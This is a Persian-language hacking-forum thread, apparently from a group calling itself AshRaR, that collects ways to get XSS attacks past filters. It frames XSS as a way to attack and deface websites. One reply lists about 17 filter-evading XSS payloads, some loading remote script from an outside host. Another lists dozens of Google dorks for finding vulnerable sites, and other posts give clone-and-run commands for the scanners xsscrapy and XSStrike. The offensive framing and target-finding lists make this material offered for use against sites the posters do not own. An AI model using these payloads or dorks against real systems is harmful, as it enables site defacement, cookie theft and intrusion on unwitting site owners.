زمان جاری : جمعه 09 آبان 1399 - 5:11 قبل از ظهر
نام کاربری : پسورد : یا عضویت | رمز عبور را فراموش کردم






ارسال پاسخ
تعداد بازدید 2551
نویسنده پیام
eblisshar آفلاین


ارسال‌ها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
انواع بایپس های باگ XSS
درود . در این تایپک انواع بای پس های باگ خطرناک xss رو میزاریم
این باگ در 80% سایت ها وجود داره و فقط باید بایپس بشه
xss انواع مختلقی داره و بهترین روش اینجکت کد های جاوا اسکریپت با متود get هست که در قسمت سرچ و یا هر قسمتی که با متود get ارسال بشه میشه استفاده کرد
و البته فرقی هم نداره و میشه با متود post تست کرد مثل فروم ها و فیلدهای ثبت نام و غیره . برای پیدا کردن سایت های که این باگ رو دارن دورک های زیادی نوشته شده که داخل همین انجمن میتونید پیدا کنید.
باگ xss قدرت بسیار بالای داره و یکی از خظرناک ترین و رایج ترین باگ ها هست شما میتونید کار های بسیار زیادی با استفاده از این باگ کنید و حتی سایت رو دیفیس کنید
در اینجا سعی میکنیم تمام اسکریپهای بایپس این باگ رو قرار بدیم
به علت قدرت بالای این باگ و اینکه گزاشتن مستقیم کد ها در انجمن باعث اجرای کد میشه اسکریپ ها در فایل تکست گزاشته میشه

امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8
سه شنبه 24 مهر 1397 - 03:16
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
[RB:Blog_Keywords_Tags] اشرارتیم
تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran & virus32 & amirshar & demon & e-deh & mrfucker & gandi & nolan & sativa & sharboy & mrattacker & reza_d &
eblisshar آفلاین



ارسال‌ها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
پاسخ : 2 RE انواع بایپس های باگ XSS
دانلود :

xsscheatsheet

امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 13 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / mrrobot / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
پاسخ : 3 RE انواع بایپس های باگ XSS
دانلود : xss code

امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 13 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / mrrobot / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
پاسخ : 4 RE انواع بایپس های باگ XSS
دانلود :
xss script

امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
پاسخ : 5 RE انواع بایپس های باگ XSS
دانلود :

XSS.script

امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8
سه شنبه 24 مهر 1397 - 03:23
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
پاسخ : 6 RE انواع بایپس های باگ XSS
و این هم کامل ترین و بزرگترین لیست از بایپس های این باگ که شخصا جمع اوری کردم و نوشتم



امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8
سه شنبه 24 مهر 1397 - 03:25
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
پاسخ : 7 RE انواع بایپس های باگ XSS


کد:

Full URI uriInHTMLData() uriInHTMLComment() uriInSingleQuotedAttr() uriInDoubleQuotedAttr() uriInUnQuotedAttr()
URI Path uriPathInHTMLData() uriPathInHTMLComment() uriPathInSingleQuotedAttr() uriPathInDoubleQuotedAttr() uriPathInUnQuotedAttr()
URI Query uriQueryInHTMLData() uriQueryInHTMLComment() uriQueryInSingleQuotedAttr() uriQueryInDoubleQuotedAttr() uriQueryInUnQuotedAttr()
URI Component uriComponentInHTMLData() uriComponentInHTMLComment() uriComponentInSingleQuotedAttr() uriComponentInDoubleQuotedAttr() uriComponentInUnQuotedAttr()
URI Fragment uriFragmentInHTMLData() uriFragmentInHTMLComment() uriFragmentInSingleQuotedAttr() uriFragmentInDoubleQuotedAttr() uriFragmentInUnQuotedAttr()


امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8
سه شنبه 24 مهر 1397 - 05:01
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
پاسخ : 8 RE انواع بایپس های باگ XSS
یک ابزار عالی پایتون برای تست نفوذ سایت با باگ xss

git clone https://github.com/DanMcInerney/xsscrapy.git

cd xsscrapy

./xsscrapy.py -u http://example.com


امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8
سه شنبه 24 مهر 1397 - 05:04
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
blackwolf_iran آفلاین



ارسال‌ها : 52
عضویت: 19 /7 /1397
تشکرها : 312
تشکر شده : 271
پاسخ : 9 RE انواع بایپس های باگ XSS
بسیار عالی و کاربردی

این هم یک لیست خوب از پیلود های این باگ



امضای کاربر :
باید ادامه داد مثل چریک پیر
شاهین نجفی
سه شنبه 24 مهر 1397 - 05:10
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از blackwolf_iran به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
blackwolf_iran آفلاین



ارسال‌ها : 52
عضویت: 19 /7 /1397
تشکرها : 312
تشکر شده : 271
پاسخ : 10 RE انواع بایپس های باگ XSS
بایپس های دیگر

کد:

<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confiru006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javascript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((prou006dpt))()//
<sCript x>;(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src //onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>


امضای کاربر :
باید ادامه داد مثل چریک پیر
شاهین نجفی
سه شنبه 24 مهر 1397 - 05:11
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از blackwolf_iran به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
darkshadow آفلاین



ارسال‌ها : 172
عضویت: 8 /6 /1397
محل زندگی: California LA
تشکرها : 400
تشکر شده : 641
پاسخ : 11 RE دورک xss
و این هم دروکهای خوب xss برای پیدا کردن سایت

کد:

inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/search_results.php?search=Search&k=
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:pages/match_report.php?mid= pages/match_report.php?mid=
inurl:/notice.php?msg= /notice.php?msg=
inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
inurl:/index.php?option=com_easygb&Itemid=
inurl:/2wayvideochat/index.php?r=
inurl:/view.php?PID= /view.php?PID=
inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
inurl:/showproperty.php?id= /showproperty.php?id=
inurl:/vehicle/buy_do_search/?order_direction=
inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
inurl:/winners.php?year=2008&type= /winners.php?
inurl:/schoolmv2/html/studentmain.php?*******=
inurl:/site_search.php?sfunction= /site_search.php?sfunction=
inurl:/search.php?search_keywords= /search.php?search_keywords=
inurl:/hexjector.php?site= /hexjector.php?site=
inurl:/news.php?id= /news.php?id=
inurl:/index.php?view=help&faq=1&ref=
inurl:"contentPage.php?id="
inurl:"displayResource.php?id="
inurl:/index.php?
inurl:/info.asp?
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=

inurl:/pages/match_report.php?mid= pages/match_report.php?mid=


امضای کاربر :
کتگوری های انجمن

اخرین تاپیک های انجمن

کتگوری هکینگ


دوست داشتنی ترین چیزها اگر تو را ضعیف کنند، خطرناک ترین چیزهایند.
شاهین نجفی
سه شنبه 24 مهر 1397 - 08:11
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از darkshadow به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
virus32 آفلاین



ارسال‌ها : 44
عضویت: 26 /6 /1397
تشکرها : 222
تشکر شده : 241
پاسخ : 12 RE انواع بایپس های باگ XSS
سایت کاربردی جهت تست نفوذ باگ xss و دانلود ابزارها و ...


یکشنبه 06 آبان 1397 - 05:00
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 9 کاربر از virus32 به خاطر این مطلب مفید تشکر کرده اند: amirshar / demon / e-deh / mrfucker / gandi / sativa / sharboy / mrattacker / reza_d /
virus32 آفلاین



ارسال‌ها : 44
عضویت: 26 /6 /1397
تشکرها : 222
تشکر شده : 241
پاسخ : 13 RE انواع بایپس های باگ XSS
یک لیست از متود های جدید و حرفه ای برای بایپس باگ xss

دانلود :



یکشنبه 06 آبان 1397 - 05:37
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 10 کاربر از virus32 به خاطر این مطلب مفید تشکر کرده اند: eblisshar / amirshar / demon / e-deh / mrfucker / gandi / sativa / sharboy / mrattacker / reza_d /
demon آفلاین



ارسال‌ها : 76
عضویت: 17 /2 /1397
سن: 22
تشکرها : 362
تشکر شده : 358
پاسخ : 14 RE انواع بایپس های باگ XSS
مقاله مفید و یک ابزار برای اموزش XSS (Cross Site Scripting)


امضای کاربر : اشرار پایدار

Ali Mrd

Twitter : twitter.com/Mokh4lef

AshRaR.Info

shahinnajafi.ashrar.info
پنجشنبه 01 آذر 1397 - 20:10
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 8 کاربر از demon به خاطر این مطلب مفید تشکر کرده اند: e-deh / mrfucker / gandi / virus32 / sativa / sharboy / mrattacker / reza_d /
demon آفلاین



ارسال‌ها : 76
عضویت: 17 /2 /1397
سن: 22
تشکرها : 362
تشکر شده : 358
پاسخ : 15 RE باگ xss

  • سایت xss scanner برای تست انلاین باگ xss





امضای کاربر : اشرار پایدار

Ali Mrd

Twitter : twitter.com/Mokh4lef

AshRaR.Info

shahinnajafi.ashrar.info
دوشنبه 22 مهر 1398 - 02:52
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 5 کاربر از demon به خاطر این مطلب مفید تشکر کرده اند: virus32 / sativa / sharboy / mrattacker / reza_d /
demon آفلاین



ارسال‌ها : 76
عضویت: 17 /2 /1397
سن: 22
تشکرها : 362
تشکر شده : 358
پاسخ : 16 RE هک سایت باگ xss
ابزار
XSStrike
انواع حملات باگ xss

  • Suggest a feature

  • Report a bug

  • Fix something and open a pull request

  • Create a browser extension

  • Create a burp suite/zaproxy plugin

  • Help me document the code

  • Spread the word






  • git clone https://github.com/s0md3v/XSStrike.git




    امضای کاربر : اشرار پایدار

    Ali Mrd

    Twitter : twitter.com/Mokh4lef

    AshRaR.Info

    shahinnajafi.ashrar.info
    دوشنبه 22 مهر 1398 - 02:56
    نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
     تشکر شده: 5 کاربر از demon به خاطر این مطلب مفید تشکر کرده اند: virus32 / sativa / sharboy / mrattacker / reza_d /
    ارسال پاسخ



    برای ارسال پاسخ ابتدا باید لوگین یا ثبت نام کنید.


    پرش به انجمن :


    تماس با ما | انواع بایپس های باگ XSS | بازگشت به بالا | پیوند سایتی RSS
    تاپیک های مرتبط
    موضوع تاریخ تعداد پاسخ آخرین ارسال بازدید
    [Post_Title] [Post_Date] [Post_Answer] [Post_Last_User] [Post_Hit]